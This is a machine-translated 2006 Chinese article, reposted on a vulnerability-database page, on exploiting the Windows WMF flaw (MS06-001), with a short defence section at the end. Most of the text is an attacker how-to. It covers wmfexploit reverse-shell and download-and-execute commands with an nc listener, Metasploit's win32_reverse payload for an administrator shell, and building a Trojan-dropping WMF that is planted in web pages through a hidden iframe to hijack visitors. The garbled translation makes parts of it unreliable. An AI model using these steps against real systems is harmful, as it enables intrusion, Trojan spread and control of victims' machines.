Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
myhack58佚名MYHACK58:6220068735
HistoryApr 13, 2006 - 12:00 a.m.

Be careful alert! By the picture caused the overflow of the crisis-vulnerability warning-the black bar safety net

2006-04-1300:00:00
佚名
www.myhack58.com
23
JSON

On the in just into the 2 0 0 6 year on the occasion, the Windows System has a serious vulnerability, which is the Microsoft Windows graphics rendering engine wmf format code vulnerability, ms0601 it. This vulnerability in the Windows graphics rendering engine, hackers can construct malicious wmf file, to lure other users to open, when the system does not update through the wmf patch, will perform the hack pre-set malicious code, The acquisition system of the highest privilege, thereby completely surrendering to the hackers. In the vulnerability announced a few days later, on the network using the wmf vulnerability to the spread of viruses, attacks constantly, until today, the Internet is still rife with countless the use of the wmf vulnerability. This article will introduce about the wmf vulnerability knowledge and prevention methods.

Since the wmf vulnerability involves the Windows System version, including Windows from 9 8 to Windows 2 0 0 3 All system version, so the harm is huge. The current use of the wmf vulnerability attacks mainly include two categories: 1. Overflow attacks 2. Using the vulnerability web pages created Trojan. The former can allow hackers to give the system the highest authority, the latter may be the victims computer become hackers broiler chickens. Below we take a look at how hackers exploit the wmf vulnerability.

A. The use of dedicated spill tools

wmf vulnerability of the overflow tool in the vulnerability announced a few days after it appeared online, although published earlier, the presence of some defects, but still can easily got to there will be the vulnerability of the host to overflow. This overflow tool named wmfexploit it. After download extract it to c drive due to overflow, the program will be antivirus think is a virus, so the test is required when the antivirus is closed, point“Start”→“Run”, enter“CMD”to run command prompt. In the“command prompt”into the c drive, enter wmfexploit after you can view its instructions for use. Its overflow there are two ways: 1.The Reverse the overflow formula 2. Active download perform.

**1. Reverse overflow, and penetrate the firewall **
The reverse overflow of the maximum benefit that can penetrate the firewall. At the same time because of the wmf vulnerability, we cannot by the vulnerability scanner to determine which hosts are vulnerable, so you can use the reverse connection, so there is vulnerability of the host active connection of the machine.

In the“command prompt”to run wmfexploit, you can see its the reverse of the overflow of the instructions for use. Its use is as follows: wmfexploit 1 <local host> <local port> <con host> <con port>. Where the number 1 represents the overflow mode for the reverse connection, the“<local host> <local port>”represents the machine’s IP address and port, this is the role of this machine on a web service, so that the target can access the machine of the malicious wmf file, the resulting overflow. The last“<con host> <con port>”is the reverse of the overflow returns to the shell when the listening IP address and port. Here is an example of“wmfexploit 1 192.168.0.1 7 7 7 192.168.0.1 8 8 8”in. Set after a carriage return, overflow, the program displays the bind success!

!

Figure 1. Successfully set up the reverse connection

After the setup is complete, we enter the“command prompt”, then run the name of the network tool nc, enter the following command“nc -vv -l -p 8 8 8”, so the nc will start listening to the machine 8 8 8 port. Then we can lure the target visits our malicious wmf file. The URL“http://192.168.0.1:7 7 7/any. wmf”to each other. When the target open this address, it will run our bundled with the overflow information of the wmf file. We go back to using the nc monitor window, you can see that the target host has been successfully overflow.

!
Figure 2. Overflow to get a shell

Tip: in the above-mentioned IP address 1 9 2. 1 6 8. 0. 1, and belongs to the network IP, just convenient for the machine test, if you want the external web host for testing, you will need the machine’s internal network IP to outside network IP.

**2. Download execution directly to run the Trojan **
In addition to the reverse overflow, wmfexploit there a overflow way is to download the implementation. When the target host is running a malicious wmf file overflow occurs, does the shell send to the machine listening on the port, but directly from the specified URL to download an exe file to run, this file can be a Trojan, can also be other programs. Of course we also need to have a web space, used to place the need to execute the exe file.

View download performing type of overflow to use: wmfexploit 2 <local host> <local port> <url to download>. The number 2 indicates the overflow mode to download the Execute the formula, the final<url to download>shows the exe file’s URL. For example for“wmfexploit 2 192.168.0.1 7 7 7 http://www.***. com/123.exe”it. After the setup is complete we don’t need to use nc to listen, just send the URL“http://192.168.0.1:7 7 7/any. wmf”.II. Using the graphical overflow test system

metasploit is a famous overflow test system, almost for all current overflow vulnerability tested, can be said that all overflow program integration. Of course its not as simple will spill procedures stacked together, but to provide a convenient operation, targeted overflow test platform. This test system the biggest advantage is the use of a fully graphical operation interface, which for the Rookie of the overflow test is very convenient.

To download and install metasploit on. After completion click on“start”to run the program group in the“MSFUpdate”, the program will pop up a“Command Prompt”window, showing the need to update the list of files, enter“yes”ENTER after you can start to overflow program update. After the update is completed run the“MSFweb”, is used to turn on the machine the metasploi browsing service. Then open the browser, in the address bar enter“http://127.0.0.1:55555”you can open metasploi the operation of the interface. Select the overflow in the list“Windows XP/2 0 0 3/Vista Metafile Escape() SetAbortProc Code Execution”into the vulnerability information of the interface, and then click the bottom“0 - Automatic - Windows XP / Windows 2 0 0 3 / Windows Vista (default)”test, then appears the“Select Payload:”option select the“win32_reverse”in. Finally came the overflow of information related to the fill, in the options simply set the“HTTPHOST”, AND“HTTPPORT / ”AND“LHOST”AND“LPORT”four, other kept default. Set the methods and principles with wmfexploit similar, this will not elaborate.

!
Figure 3. In metasploit, fill in the overflow of information

The same will be malicious wmf file address to the target, when the other occurs after the spill, we tap into the metasploit interface on the“SESSIONS”you can get an administrator privileges the shell.

Tip: when using metasploi must be updated, otherwise it may not have the wmf vulnerability-related testing options.

III. Exploit the vulnerability to create web pages the Trojan

the wmf vulnerability is causing the greatest impact is the Internet page of the Trojans were flying, due to the anti-virus software to picture file detection is not powerful enough, so the use of the wmf vulnerability make the web page the Trojan is very likely to be successful, it also became a recent web Trojans in the lead. Below we take a look at the wmf web page Trojan.

First we need to prepare a Trojan, here recommend similar gray pigeons bounce connection Trojan, so that when the target is overflowed by the Trojan actively connected to our host without our active connection, convenient for broiler management. You would then configure a good Trojans service end place to the web space on can apply for free space to store it.

Download wmf Trojan making program ms0601 it. After the download is complete in“command prompt”in the run, you can see very simple to use: ms0601 [THE URL OF EXEFILE], directly enter the Trojan file where the URL can be. Carriage return after it can be in the same directory to generate an exploit. wmf file, run the wmf file will trigger the overflow and automatically from the web page to download the Trojan file is executed.

Will exploit. wmf files are uploaded to the web space. The last we need in the website page’s source code insert the following sentence in the code:<iframe src=exploit. wmf URL widht room=0 height=0></iframe>. So when someone access the home page, it will not pop up a new browser window, but directly run the exploit. wmf to overflow. ** * * Four. Fill exploits, anti-Trojan**

Since the wmf vulnerability published late, and therefore on the network there is a lot more didn’t hit a good patch system. Whether it is overflow or web Trojan, the success rate is very high, which is also giving virus and Trojan propagation provides a way. In the understanding of how hackers exploit the wmf vulnerability, we then look at how to fill in the holes, to prevent the use of the wmf vulnerability of the web page Trojan.

1. Anti-register the dll files

Due to the need to use the Windows Picture to view a malicious wmf file will trigger the overflow, so if it is inconvenient to beat the system patch, you can first try to reverse the registration of Windows Picture 的 dll 文件 Shimgvw.dll anti-registration after the Windows Picture will not be able to run again, overflow would not exist.

Anti-registration method: point“Start”→“Run”, input“regsvr32-u %windir%/system32/shimgvw.dll”. If you want to restore using Windows Picture, you can enter“regsvr32 %windir%/system32/shimgvw.dll”to re-register.

!
图 4. 反 注册 Shimgvw.dll

**2. Using vulnerability patch **
Currently Microsoft has released this vulnerability patch, download address: http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx this is the most thorough and alsoIs the most secure repair.

If it is inconvenient to hit Microsoft’s system patches, it can be recommended to use a third-party production of the patch program:

**3. Be wary of the unknown picture file **
If a malicious wmf file is placed in the web space, we access this malicious wmf file will produce a different situation, Win2000 mainly for appears download prompt box, asking to download the wmf file. While WinXP and Win2003 it POPs up the Windows picture viewer, the content of the picture cannot be displayed. Encounter this situation, we should be careful, it is possible that this wmf file with an overflow of information. Of course, not necessarily only the wmf is the suffix of the image file can trigger the overflow, others, such as jpg, bmp and other image formats as long as after construction, the same can be overflow. Therefore we want to don’t the picture be careful, the hackers tend to be malicious picture file a tempting name, to lure others to open.

!
Figure 5. To open a malicious wmf file when the performance

In addition, the update anti-virus software is a must, the latest antivirus software and virus database have been malicious wmf file as a virus.

JSON